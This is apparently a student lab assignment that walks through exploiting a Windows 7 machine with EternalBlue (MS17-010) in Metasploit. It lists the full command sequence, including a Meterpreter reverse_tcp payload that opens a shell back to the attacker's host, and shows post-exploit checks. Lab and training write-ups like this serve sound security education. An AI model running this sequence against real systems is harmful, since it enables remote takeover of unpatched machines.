Ethical Hacking Assignment 1

Hack Windows 7 PC using EternalBlue

Abstract

Ethical hacking involves an authorized attempt to gain unauthorized access to a

computer system, application, or data. Here I am hacking a Windows 7 PC using
EternalBlue expolit. Carrying out an ethical hack involves duplicating strategies
and actions of malicious attackers. This practice helps to identify security
vulnerabilities which can then be resolved before a malicious attacker has the
opportunity to exploit them.

Introduction

Here we are hacking a windows 7 PC using EternalBlue exploit. So we need a

target machine with Windows 7 and a host machine with Kali Linux. The Kali
Linux should contain Metasploit. Metasploit is an open-source tool that was
designed by Rapid7 technologies. It is one of the world’s most used penetration
testing frameworks. It comes packed with a lot of exploits to exploit the
vulnerabilities over a network or operating systems.

An exploit is a program, or piece of code, designed to find and take advantage of a

security flaw or vulnerability in an application or computer system, typically for
malicious purposes such as installing malware. An exploit is not malware itself, but
rather it is a method used to deliver malware. EternalBlue is the exploit we use in
this operation.

EternalBlue is an exploit that allows cyber threat actors to remotely execute

arbitrary code and gain access to a network by sending specially crafted packets. It
exploits a software vulnerability in Microsoft’s Windows operating systems (OS)
Server Message Block (SMB) version 1 (SMBv1) protocol, a network file sharing
protocol that allows access to files on a remote server.
Background

Microsoft introduced Windows 7 in 2009, but ended mainstream support for the
system in 2015.That's because it was making way for Windows 10 – also launched
in 2015.

Windows 7 has only received crucial security updates for the past four years. These
updates officially ended on January 14, 2020.

But there are users still using Windows 7 operating system. Hundreds of millions
of people will be affected as more than a third of PCs use Windows 7, according to
NetMarketShare.

EternalBlue is an exploit most likely developed by the NSA as a former zero-day.

It was released in 2017 by the Shadow Brokers, a hacker group known for leaking
tools and exploits used by the Equation Group, which has possible ties to the
Tailored Access Operations unit of the NSA.

EternalBlue, also known as MS17-010, is a vulnerability in Microsoft's Server

Message Block (SMB) protocol. SMB allows systems to share access to files,
printers, and other resources on the network. The vulnerability is allowed to occur
because earlier versions of SMB contain a flaw that lets an attacker establish a null
session connection via anonymous login. An attacker can then send malformed
packets and ultimately execute arbitrary commands on the target.

Methodology

The first thing we need to do is open up the terminal and start Metasploit. Type
service postgresql start to initialize the PostgreSQL database, if it is not running
already, followed by msfconsole.

Next, use the search command within Metasploit to locate a suitable module to
use.

There is an auxiliary scanner that we can run to determine if a target is vulnerable

to MS17-010. It's always a good idea to perform the necessary recon like this.
Otherwise, you could end up wasting a lot of time if the target isn't even
vulnerable.
Once we have determined that our target is indeed vulnerable to EternalBlue, we
can use the following exploit module from the search we just did.

use exploit/windows/smb/ms17_010_eternalblue

You'll know you're good if you see the

"exploit(windows/smb/ms17_010_eternalblue)" prompt.

We can take a look at the current settings with the options command.

First, we need to specify the IP address of the target.

set rhosts <target ip address>

Next, we can load the trusty reverse_tcp shell as the payload.

set payload windows/x64/meterpreter/reverse_tcp

Finally, set the listening host to the IP address of our local machine.

set lhost <host ip address>

And the listening port to a suitable number.

set lport 4321

That should be everything, so the only thing left to do is launch the exploit. Use the
run command to fire it off.

run

We see a few things happen here, like the SMB connection being established and
the exploit packet being sent. At last, we see a "WIN" and a Meterpreter session is
opened. Sometimes, this exploit will not complete successfully the first time, so if
it doesn't just try again and it should go through.

We can verify we have compromised the target by running commands such as

sysinfo to obtain operating system information.
And getuid to get the current username.

Implementation

We uses terminal of Kali Linux to run commands to hack windows.

The commands are:

service postgresql start

msfconsole

search eternalblue

use exploit/windows/smb/ms17_010_eternalblue

options

set rhosts 10.10.0.10

set payload windows/x64/meterpreter/reverse_tcp

set lhost 10.10.0.1

set lport 4321

run

sysinfo

getuid

Result

Successfully hacked windows 7 PC. The shell is accessible in Kali Linux and could
rum multiple programs using EternalBlue exploit.

Findings

We can use these techniques to access a Windows 7 PC

Conclusion and future work

Reference

https://www.researchgate.net/

https://www.geeksforgeeks.org/

https://null-byte.wonderhowto.com/